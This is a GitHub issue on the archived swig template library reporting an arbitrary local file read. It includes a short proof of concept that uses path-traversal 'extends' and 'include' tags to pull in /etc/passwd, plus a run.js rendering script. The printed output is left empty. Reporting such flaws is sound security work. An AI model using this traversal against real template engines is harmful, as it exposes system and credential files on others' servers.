This repository has been archived by the owner on Feb 3, 2023. It is now read-only.

Security Issue: arbitrary local file read vulnerability during template rendering #88

Open

y1nglamore opened this issue Feb 1, 2023 · 0 comments

y1nglamore commented Feb 1, 2023

official doc:

poc:

1.html
{% extends '../../../../../etc/passwd' %}
{% include '../../../../../etc/passwd' %}

// run.js
var swig = require('swig');
var output = swig.renderFile('/Users/bytedance/Desktop/swig/tpl.html');
console.log(output);

output:

The text was updated successfully, but these errors were encountered:

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.